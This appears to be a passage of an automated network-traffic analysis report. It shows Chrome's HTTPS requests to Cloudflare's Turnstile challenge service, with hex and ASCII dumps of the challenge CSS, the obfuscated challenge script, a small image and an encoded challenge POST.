                                                        2024-07-03 19:06:52 UTC1369INData Raw: 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 72 6f 77 2d 72 65 76 65 72 73 65 20 77 72 61 70 3b 0a 20 20 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 66 6c 65 78 2d 73 74 61 72 74 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 20 31 36 70 78 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65
                                                        Data Ascii: top: 3px; margin-left: 0;}.size-compact #branding { display: flex; flex-flow: row-reverse wrap; place-content: center flex-start; align-items: center; margin: 5px 16px 0; padding-right: 0; text-align: right;}.size-compact #terms { te
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 74 65 72 6d 73 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 66 2d 73 74 61 67 65 20 7b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 38 70 78 3b 0a 7d 0a 2e 72 74 6c 20 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 6c 65 66 74 3a 20 38 36 70 78
                                                        Data Ascii: er;}.rtl .size-compact #branding { padding-right: 0; padding-left: 0; text-align: center;}.rtl .size-compact #terms { text-align: center;}.rtl .size-compact #cf-stage { padding-right: 48px;}.rtl .size-compact #success-icon { left: 86px


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.549757104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:52 UTC710OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d927bb0859422d HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:52 UTC331INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:52 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 196166
                                                        Connection: close
                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        Server: cloudflare
                                                        CF-RAY: 89d927bf39b2c443-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:52 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 7a 2c 66 46 2c 66 47 2c 66 4a 2c 66 4b 2c 67 61 2c 67 62 2c 67 66 2c 67 67 2c 67 68 2c 67 6c 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 49 2c 67 4a 2c 67 4b 2c 67 4c 2c 67 4d 2c 67 4e 2c 67 4f 2c 67 50 2c 67 51 2c 67 52 2c 67 53 2c 67 54 2c 67 55 2c 67 56 2c 67 57 2c 67 58 2c 67 59 2c 67 5a 2c 68 30 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 68 37 2c 68 38 2c 68 39 2c 68 61 2c 68 62 2c 68 63 2c 68 64 2c 68 65 2c 68 66 2c 68 67 2c 68 68 2c 68 69 2c 68 6b 2c 68 77 2c 68 4a 2c
                                                        Data Ascii: window._cf_chl_opt.uaO=false;~function(iz,fF,fG,fJ,fK,ga,gb,gf,gg,gh,gl,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gF,gG,gH,gI,gJ,gK,gL,gM,gN,gO,gP,gQ,gR,gS,gT,gU,gV,gW,gX,gY,gZ,h0,h1,h2,h3,h4,h5,h6,h7,h8,h9,ha,hb,hc,hd,he,hf,hg,hh,hi,hk,hw,hJ,
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 6d 6a 48 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 45 70 48 75 4c 27 3a 6a 61 28 38 39 32 29 2c 27 47 62 74 79 49 27 3a 6a 61 28 36 32 31 29 2c 27 70 6b 55 43 43 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 68 67 4a 57 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 6e 75 6c 6c 3d 3d 3d 68 7c 7c 68 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 6a 61 28 32 33 34 34 29 5d 28 67 65 2c 68 29 2c 67 5b 6a 61 28 32 32 30 36 29 5d 5b 6a 61 28 32 31 32 32 29 5d 26 26 28 78 3d 78 5b 6a 61 28 31 30 31 37 29 5d 28 67 5b 6a 61 28 32 32 30 36 29 5d 5b 6a 61 28 32 31 32 32
                                                        Data Ascii: mjHm':function(G,H){return G(H)},'EpHuL':ja(892),'GbtyI':ja(621),'pkUCC':function(G,H,I){return G(H,I)},'hgJWO':function(G,H,I){return G(H,I)}},null===h||h===void 0)return j;for(x=o[ja(2344)](ge,h),g[ja(2206)][ja(2122)]&&(x=x[ja(1017)](g[ja(2206)][ja(2122
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 6a 66 3d 69 7a 2c 64 3d 7b 27 49 42 67 59 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 3d 69 7d 2c 27 4a 4a 50 46 41 27 3a 6a 66 28 31 36 30 36 29 2c 27 52 64 64 59 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 43 57 6d 73 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 61 6e 47 45 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 44 52 4e 67 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 5a 6b 59 42 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 48 6e 50 62 64 27 3a 66 75 6e 63 74
                                                        Data Ascii: ){return jf=iz,d={'IBgYR':function(h,i){return h===i},'JJPFA':jf(1606),'RddYz':function(h,i){return h==i},'CWmsB':function(h,i){return h<i},'anGEk':function(h,i){return h+i},'DRNgA':function(h,i){return h<i},'ZkYBT':function(h,i){return h-i},'HnPbd':funct
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 68 29 7b 69 66 28 6a 68 3d 6a 67 2c 64 5b 6a 68 28 35 30 33 29 5d 28 64 5b 6a 68 28 32 30 35 30 29 5d 2c 6a 68 28 31 36 30 36 29 29 29 72 65 74 75 72 6e 20 6a 68 28 39 37 32 29 5b 6a 68 28 31 38 39 34 29 5d 28 69 29 3b 65 6c 73 65 7b 69 66 28 21 69 29 72 65 74 75 72 6e 3b 68 5b 6a 68 28 31 32 38 32 29 5d 5b 6a 68 28 31 38 30 33 29 5d 28 69 2c 6a 5b 6a 68 28 31 32 33 31 29 5d 29 7d 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 69 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4f 29 7b 69 66 28 6a 69 3d 6a 66 2c 69 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32
                                                        Data Ascii: ':f.g(h,6,function(i,jh){if(jh=jg,d[jh(503)](d[jh(2050)],jh(1606)))return jh(972)[jh(1894)](i);else{if(!i)return;h[jh(1282)][jh(1803)](i,j[jh(1231)])}})},'g':function(i,j,o,ji,s,x,B,C,D,E,F,G,H,I,J,K,L,M,O){if(ji=jf,i==null)return'';for(x={},B={},C='',D=2
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 66 28 6a 69 28 31 31 32 39 29 3d 3d 3d 64 5b 6a 69 28 32 32 36 39 29 5d 29 7b 69 66 28 4f 62 6a 65 63 74 5b 6a 69 28 36 30 31 29 5d 5b 6a 69 28 31 34 30 31 29 5d 5b 6a 69 28 36 30 34 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 6a 69 28 31 36 38 35 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 6a 69 28 35 30 36 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 6a 69 28 34 30 31 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 6a 69 28 36 39 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 69 28 31 36 38 35 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 69 28 31 31 35 33 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 6a 69 28 31 37 31 37 29 5d 28 64 5b 6a 69 28 31 31 35 34 29 5d 28 48 2c 31 29 2c 31 2e 35 35 26
                                                        Data Ascii: f(ji(1129)===d[ji(2269)]){if(Object[ji(601)][ji(1401)][ji(604)](B,C)){if(256>C[ji(1685)](0)){for(s=0;d[ji(506)](s,F);H<<=1,d[ji(401)](I,j-1)?(I=0,G[ji(695)](o(H)),H=0):I++,s++);for(M=C[ji(1685)](0),s=0;d[ji(1153)](8,s);H=d[ji(1717)](d[ji(1154)](H,1),1.55&
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 6c 28 36 32 32 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 6a 6c 28 31 31 37 37 29 5d 28 30 3c 4c 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 6a 6c 28 37 37 30 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 6c 28 36 32 32 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 6a 6c 28 31
                                                        Data Ascii: ](0,L)?1:0,F),F<<=1);switch(J){case 0:for(J=0,K=Math[jl(622)](2,8),F=1;F!=K;L=G&H,H>>=1,0==H&&(H=j,G=o(I++)),J|=d[jl(1177)](0<L?1:0,F),F<<=1);M=d[jl(770)](e,J);break;case 1:for(J=0,K=Math[jl(622)](2,16),F=1;F!=K;L=H&G,H>>=1,H==0&&(H=j,G=o(I++)),J|=(d[jl(1
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 28 32 34 34 33 29 2c 27 77 69 64 67 65 74 49 64 27 3a 66 46 5b 6a 6e 28 31 30 37 35 29 5d 5b 6a 6e 28 38 39 34 29 5d 2c 27 65 76 65 6e 74 27 3a 6a 6e 28 32 32 34 31 29 2c 27 63 66 43 68 6c 4f 75 74 27 3a 66 46 5b 6a 6e 28 31 30 37 35 29 5d 5b 6a 6e 28 31 33 36 32 29 5d 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 66 46 5b 6a 6e 28 31 30 37 35 29 5d 5b 6a 6e 28 38 39 36 29 5d 2c 27 63 6f 64 65 27 3a 6a 6e 28 31 32 33 32 29 2c 27 72 63 56 27 3a 66 46 5b 6a 6e 28 31 30 37 35 29 5d 5b 6a 6e 28 32 32 39 30 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 66 46 5b 69 7a 28 31 39 38 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 6a 6f 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 29 7b 6a 3d 28 6a 6f 3d 69 7a 2c 69 3d 7b 7d 2c 69 5b 6a 6f 28 31 35
                                                        Data Ascii: (2443),'widgetId':fF[jn(1075)][jn(894)],'event':jn(2241),'cfChlOut':fF[jn(1075)][jn(1362)],'cfChlOutS':fF[jn(1075)][jn(896)],'code':jn(1232),'rcV':fF[jn(1075)][jn(2290)]},'*'))},g)},fF[iz(1981)]=function(f,g,h,jo,i,j,k,l,m,n,o,s,x,B){j=(jo=iz,i={},i[jo(15
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 27 74 79 6d 41 44 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 2d 6d 7d 2c 27 56 71 6b 78 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 5e 6c 7d 2c 27 52 77 62 6a 65 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 6d 65 49 75 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 47 4b 7a 75 43 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6c 3e 3e 3e 6d 7d 2c 27 43 42 7a 48 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 28 6d 2c 6e 29 7d 2c 27 72 46 73 6f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 72 65 74 75 72 6e 20 6d 26 6c 7d 2c
                                                        Data Ascii: 'tymAD':function(l,m){return l-m},'Vqkxm':function(l,m){return m^l},'Rwbje':function(l,m,n){return l(m,n)},'meIuj':function(l,m,n){return l(m,n)},'GKzuC':function(l,m){return l>>>m},'CBzHZ':function(l,m,n){return l(m,n)},'rFsoN':function(l,m){return m&l},
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 31 34 39 30 29 5d 28 62 54 2c 42 2c 62 55 5b 37 5d 29 7d 65 6c 73 65 20 66 46 5b 6a 70 28 31 35 31 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6a 71 29 7b 6a 71 3d 6a 70 2c 66 46 5b 6a 71 28 32 32 37 33 29 5d 28 29 7d 2c 31 65 33 29 7d 65 6c 73 65 20 6b 3d 5b 6a 70 28 36 31 37 29 2b 63 2c 68 5b 6a 70 28 35 39 31 29 5d 28 6a 70 28 39 30 33 29 2c 64 29 2c 68 5b 6a 70 28 31 30 33 38 29 5d 2b 65 2c 6a 70 28 31 33 37 34 29 2b 66 2c 68 5b 6a 70 28 38 34 32 29 5d 28 6a 70 28 36 32 33 29 2c 4a 53 4f 4e 5b 6a 70 28 31 38 30 30 29 5d 28 67 29 29 5d 5b 6a 70 28 34 32 33 29 5d 28 68 5b 6a 70 28 31 36 34 35 29 5d 29 2c 66 46 5b 6a 70 28 31 35 31 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6a 72 29 7b 6a 72 3d 6a 70 2c 66 46 5b 6a 72 28 31 39 38 31 29 5d 28 6b 2c 75 6e 64 65 66
                                                        Data Ascii: 1490)](bT,B,bU[7])}else fF[jp(1512)](function(jq){jq=jp,fF[jq(2273)]()},1e3)}else k=[jp(617)+c,h[jp(591)](jp(903),d),h[jp(1038)]+e,jp(1374)+f,h[jp(842)](jp(623),JSON[jp(1800)](g))][jp(423)](h[jp(1645)]),fF[jp(1512)](function(jr){jr=jp,fF[jr(1981)](k,undef
                                                        2024-07-03 19:06:52 UTC1369INData Raw: 34 38 31 29 2c 67 70 5b 69 7a 28 31 34 34 35 29 5d 3d 69 7a 28 31 32 39 30 29 2c 67 70 5b 69 7a 28 39 38 36 29 5d 3d 69 7a 28 38 38 31 29 2c 67 70 5b 69 7a 28 31 33 30 35 29 5d 3d 69 7a 28 32 32 35 31 29 2c 67 70 5b 69 7a 28 32 30 34 36 29 5d 3d 69 7a 28 34 37 35 29 2c 67 70 5b 69 7a 28 32 33 36 33 29 5d 3d 69 7a 28 35 34 35 29 2c 67 70 5b 69 7a 28 34 30 35 29 5d 3d 69 7a 28 32 33 30 35 29 2c 67 70 5b 69 7a 28 31 33 33 31 29 5d 3d 69 7a 28 32 33 35 31 29 2c 67 71 3d 7b 7d 2c 67 71 5b 69 7a 28 37 35 38 29 5d 3d 69 7a 28 39 39 37 29 2c 67 71 5b 69 7a 28 34 33 36 29 5d 3d 69 7a 28 31 33 32 33 29 2c 67 71 5b 69 7a 28 31 32 33 36 29 5d 3d 69 7a 28 37 39 32 29 2c 67 71 5b 69 7a 28 34 37 39 29 5d 3d 69 7a 28 31 32 31 37 29 2c 67 71 5b 69 7a 28 31 30 39 32 29 5d
                                                        Data Ascii: 481),gp[iz(1445)]=iz(1290),gp[iz(986)]=iz(881),gp[iz(1305)]=iz(2251),gp[iz(2046)]=iz(475),gp[iz(2363)]=iz(545),gp[iz(405)]=iz(2305),gp[iz(1331)]=iz(2351),gq={},gq[iz(758)]=iz(997),gq[iz(436)]=iz(1323),gq[iz(1236)]=iz(792),gq[iz(479)]=iz(1217),gq[iz(1092)]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.549758104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:52 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:52 UTC240INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:52 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 89d927c04ba472ab-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.549760104.17.2.1844433748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-03 19:06:53 UTC916OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 2675
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Content-type: application/x-www-form-urlencoded
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        CF-Challenge: 9126e412fd5a54e
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-07-03 19:06:53 UTC2675OUTData Raw: 76 5f 38 39 64 39 32 37 62 62 30 38 35 39 34 32 32 64 3d 2d 76 59 37 31 37 45 37 70 37 4c 37 43 37 7a 50 47 4a 50 47 39 70 4d 39 4d 6f 69 51 4d 69 47 4d 70 71 6f 36 59 67 47 78 71 47 66 70 77 6f 6e 76 4d 53 47 46 50 7a 47 71 76 47 38 47 66 44 76 47 76 32 67 47 2d 67 48 48 47 24 49 47 4d 68 4a 56 70 69 6e 47 37 77 59 47 68 47 32 73 58 47 4a 65 6a 67 66 32 47 38 55 71 4d 74 48 47 48 39 55 6d 51 50 65 73 36 55 48 69 62 39 4d 31 4e 2d 62 34 52 68 24 54 38 67 69 4f 32 47 4d 67 69 44 47 66 7a 37 35 4f 47 4d 35 6a 43 6e 6a 58 32 44 73 50 47 67 68 74 37 67 67 43 37 47 65 69 47 47 64 47 46 62 49 4f 47 7a 32 47 46 71 47 4f 43 63 62 76 2d 4d 62 37 46 66 35 68 47 47 74 47 48 55 6a 2d 47 47 7a 38 37 47 30 77 58 2d 75 38 50 50 57 7a 67 32 47 4a 4e 6c 67 37 69 6f 34 37
                                                        Data Ascii: v_89d927bb0859422d=-vY717E7p7L7C7zPGJPG9pM9MoiQMiGMpqo6YgGxqGfpwonvMSGFPzGqvG8GfDvGv2gG-gHHG$IGMhJVpinG7wYGhG2sXGJejgf2G8UqMtHGH9UmQPes6UHib9M1N-b4Rh$T8giO2GMgiDGfz75OGM5jCnjX2DsPGght7ggC7GeiGGdGFbIOGz2GFqGOCcbv-Mb7Ff5hGGtGHUj-GGz87G0wX-u8PPWzg2GJNlg7io47
                                                        2024-07-03 19:06:54 UTC771INHTTP/1.1 200 OK
                                                        Date: Wed, 03 Jul 2024 19:06:54 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 131544
                                                        Connection: close
                                                        cf-chl-gen: 5VzdGxcGcq19Ns6dfkKu6b27LZjnbI1aWiHNZX/vx2UEXHafzzVEIYGUUfciu6lyNsmsqHohnJGVPUwQfAdxBjHcmiz8+uPYFhij4KQm2Od0FKmOhWpUg+f2RIVRTycFLiYZpLo0vvhyoDr8B1dwArSepxaurv0ziyIxuIGeICtP99EX4WNDJiI6JW+EMfnd919iEm2UK44z9eFWn2fYt+GiNLgYHplanRwV99de6CeoeeRTtf3vPrPc0AfNVm0sdBEo5Mk9qwOdy7qm6Z5amrQX7pjHXubx2jK0ze5wyi5mfAJZxlV23hDZmMJXgrJ2klkYOtelOKOHmbYnznjK9Fip/yF7nrzALLf/oPqUyq0fn1C9Q4HUWdGml71y2FeUGKAd6G2EuFkm1EqewsugndxZ+AmUQ8m4jUyAYQ92R7LfryFtAl1mYs0DuSqWAEW2+80In2bqk8aNU7YQXxfH8yBviR45DsLfiMXWj8CL0gccf4Q1XCFCXdaNuN19GnFw$cetHjJWHJctJ3ndOFSJCeQ==
                                                        Server: cloudflare
                                                        CF-RAY: 89d927c7698042b8-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-07-03 19:06:54 UTC598INData Raw: 72 62 4f 32 66 4a 62 42 76 33 69 5a 6e 35 37 43 6f 72 43 4a 77 62 72 44 68 72 71 33 72 38 2f 4f 71 64 43 75 6f 61 43 78 70 4a 6d 73 70 4e 76 4e 33 73 6e 4b 77 62 69 61 74 4f 57 64 6e 74 2b 32 6e 64 6d 38 75 4e 6a 65 37 4d 66 4d 35 38 33 7a 30 37 44 44 79 2f 44 33 37 37 54 4a 79 4d 79 30 77 76 45 48 42 72 33 51 38 39 4c 49 79 51 62 4a 36 78 44 74 32 2b 44 74 43 4f 44 6b 46 50 67 50 2b 39 73 4b 36 41 76 2b 46 52 73 54 41 78 6b 68 45 69 72 37 39 50 6e 6c 2f 76 73 4b 44 65 30 41 44 68 49 50 46 78 45 57 46 79 55 63 44 66 6a 32 51 66 73 32 44 44 6b 39 4c 6a 41 39 4b 55 67 72 4f 69 6b 76 48 45 4e 44 49 79 45 63 49 42 51 72 45 43 52 46 54 69 63 50 4a 78 59 72 50 6b 31 4d 52 46 6b 37 56 55 64 48 4f 6d 4e 4e 59 55 74 47 5a 54 31 6f 52 32 46 56 58 6d 4a 68 4e 33 68
                                                        Data Ascii: rbO2fJbBv3iZn57CorCJwbrDhrq3r8/OqdCuoaCxpJmspNvN3snKwbiatOWdnt+2ndm8uNje7MfM583z07DDy/D377TJyMy0wvEHBr3Q89LIyQbJ6xDt2+DtCODkFPgP+9sK6Av+FRsTAxkhEir79Pnl/vsKDe0ADhIPFxEWFyUcDfj2Qfs2DDk9LjA9KUgrOikvHENDIyEcIBQrECRFTicPJxYrPk1MRFk7VUdHOmNNYUtGZT1oR2FVXmJhN3h
